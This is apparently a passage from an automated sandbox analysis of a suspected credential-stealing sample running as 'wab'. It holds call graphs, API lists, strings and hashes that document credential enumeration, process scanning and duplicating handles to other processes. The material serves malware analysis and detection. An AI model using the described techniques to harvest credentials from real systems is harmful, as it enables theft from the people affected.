4446ea 11 API calls 38381->38432 38383 4251f2 38383->38042 38385 425209 38388 425249 38385->38388 38391 4250f8 127 API calls 38385->38391 38392 425287 38385->38392 38441 4384e9 135 API calls 38385->38441 38442 424f74 124 API calls 38385->38442 38386 415c7d 16 API calls 38386->38383 38388->38392 38443 424ff0 38388->38443 38391->38385 38392->38386 38393 425266 38393->38392 38446 415be9 memcpy 38393->38446 38395->38042 38396->38069 38397->38042 38399 42533e 16 API calls 38398->38399 38400 42541f 38399->38400 38401 424ff0 13 API calls 38400->38401 38402 425425 38401->38402 38403 42538f 16 API calls 38402->38403 38404 42542d 38403->38404 38404->38042 38406 425345 38405->38406 38407 425357 38405->38407 38406->38407 38408 416935 16 API calls 38406->38408 38407->38042 38408->38407 38410 425394 38409->38410 38411 42539e 38409->38411 38412 415c7d 16 API calls 38410->38412 38411->38042 38412->38411 38413->38042 38414->38060 38415->38044 38417 4442eb 38416->38417 38420 444303 38416->38420 38418 41707a 11 API calls 38417->38418 38419 4442f2 38418->38419 38419->38420 38514 4446ea 11 API calls 38419->38514 38420->38050 38422 444300 38422->38050 38423->38058 38424->38068 38426 424f1f 38425->38426 38427 424f0c 38425->38427 38448 424eea 11 API calls 38426->38448 38447 416760 11 API calls 38427->38447 38430 424f18 38430->38379 38431 424f24 38431->38379 38432->38383 38434 425108 38433->38434 38440 42510d 38433->38440 38481 424f74 124 API calls 38434->38481 38437 42516e 38439 415c7d 16 API calls 38437->38439 38438 425115 38438->38385 38439->38438 38440->38438 38449 42569b 38440->38449 38441->38385 38442->38385 38499 422f5c 38443->38499 38446->38392 38447->38430 38448->38431 38450 4256f1 38449->38450 38477 4259c2 38449->38477 38456 4259da 38450->38456 38460 422aeb memset memcpy memcpy 38450->38460 38461 429a4d 38450->38461 38465 4260a1 38450->38465 38475 429ac1 38450->38475 38450->38477 38480 425a38 38450->38480 38482 4227f0 memset memcpy 38450->38482 38483 422b84 15 API calls 38450->38483 38484 422b5d memset memcpy memcpy 38450->38484 38485 422640 13 API calls 38450->38485 38487 4241fc 11 API calls 38450->38487 38488 42413a 90 API calls 38450->38488 38455 4260dd 38493 424251 120 API calls 38455->38493 38492 416760 11 API calls 38456->38492 38460->38450 38462 429a66 38461->38462 38463 429a9b 38461->38463 38494 415c56 11 API calls 38462->38494 38467 429a96 38463->38467 38496 416760 11 API calls 38463->38496 38491 415c56 11 API calls 38465->38491 38497 424251 120 API calls 38467->38497 38470 429a7a 38495 416760 11 API calls 38470->38495 38476 425ad6 38475->38476 38498 415c56 11 API calls 38475->38498 38476->38437 38477->38476 38486 415c56 11 API calls 38477->38486 38480->38477 38489 422640 13 API calls 38480->38489 38490 4226e0 12 API calls 38480->38490 38481->38440 38482->38450 38483->38450 38484->38450 38485->38450 38486->38456 38487->38450 38488->38450 38489->38480 38490->38480 38491->38456 38492->38455 38493->38476 38494->38470 38495->38467 38496->38467 38497->38475 38498->38456 38500 422f66 38499->38500 38507 422fb6 38499->38507 38501 422f8b 38500->38501 38500->38507 38510 422693 13 API calls 38500->38510 38503 422f95 38501->38503 38504 422fb8 38501->38504 38509 422fab 38503->38509 38511 422640 13 API calls 38503->38511 38513 422726 12 API calls 38504->38513 38507->38393 38509->38507 38512 4226e0 12 API calls 38509->38512 38510->38501 38511->38509 38512->38507 38513->38507 38514->38422 38515->38074 38518 432fc6 38516->38518 38519 432fdd 38518->38519 38522 43bd08 memset 38518->38522 38520 43024d memset 38519->38520 38521 43300e 38519->38521 38520->38519 38521->38002 38522->38518 40424 4147f3 40427 414561 40424->40427 40426 414813 40428 41456d 40427->40428 40429 41457f GetPrivateProfileIntW 40427->40429 40432 4143f1 memset _itow WritePrivateProfileStringW 40428->40432 40429->40426 40431 41457a 40431->40426 40432->40431

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                      • API String ID: 594330280-3398334509
                                                                                                                                                                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 659 413e6a-413e76 655->659 656->655 661 413e46-413e5c GetProcAddress 656->661 657->658 658->639 659->651 661->655 663->642
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 912665193-1740548384
                                                                                                                                                                                                                      • Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                      • String ID: BIN
                                                                                                                                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406E8F Relevance: 3.4, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                                                        • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2420179184-0
                                                                                                                                                                                                                      • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                                      • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      Strings
